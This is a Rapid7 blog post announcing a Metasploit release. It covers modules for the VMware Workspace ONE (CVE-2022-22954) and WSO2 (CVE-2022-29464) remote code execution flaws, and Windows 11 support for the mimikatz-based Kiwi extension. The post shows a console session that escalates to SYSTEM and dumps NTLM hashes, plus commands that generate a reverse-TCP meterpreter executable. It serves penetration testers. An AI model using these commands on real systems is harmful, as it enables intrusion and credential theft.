
Metasploit Wrap-Up

2022-05-06 17:56:15
Alan David Foster
blog.rapid7.com

CVSS3: 9.8 High
  Attack Vector: NETWORK | Attack Complexity: LOW | Privileges Required: NONE | User Interaction: NONE
  Scope: UNCHANGED | Confidentiality Impact: HIGH | Integrity Impact: HIGH | Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
  Access Vector: NETWORK | Access Complexity: LOW | Authentication: NONE
  Confidentiality Impact: COMPLETE | Integrity Impact: COMPLETE | Availability Impact: COMPLETE
  Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

VMware Workspace ONE Access RCE


Community contributor wvu has developed a new Metasploit module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the 'horizon' user. This vulnerability has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis.

WSO2 Arbitrary File Upload to RCE

Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis.

Kiwi Meterpreter Updates - Windows 11 Support

The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably, this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                           SHA1
--------     ------         ----                           ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104
... etc etc ...

New module content (3)

Enhancements and features (2)

  • #16445 from dwelch-r7 - The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:

    use windows/x64/meterpreter_reverse_tcp
    set MeterpreterDebugBuild true
    set MeterpreterDebugLogging rpath:C:/test/foo.txt
    save
    generate -f exe -o shell.exe
    to_handler

  • #16462 from bcoles - Adds support for armle/aarch64 architectures to gdb_server_exec

Bugs fixed (2)

  • #16526 from jheysel-r7 - The version of the Meterpreter payloads has been upgraded to pull in a fix that ensures the Kiwi extension now works properly on Windows 11 hosts and correctly dumps credentials, rather than failing silently as it did previously.
  • #16530 from sjanusz-r7 - This updates the pihole_remove_commands_lpe module so that it no longer breaks sessions when running the check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate, and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
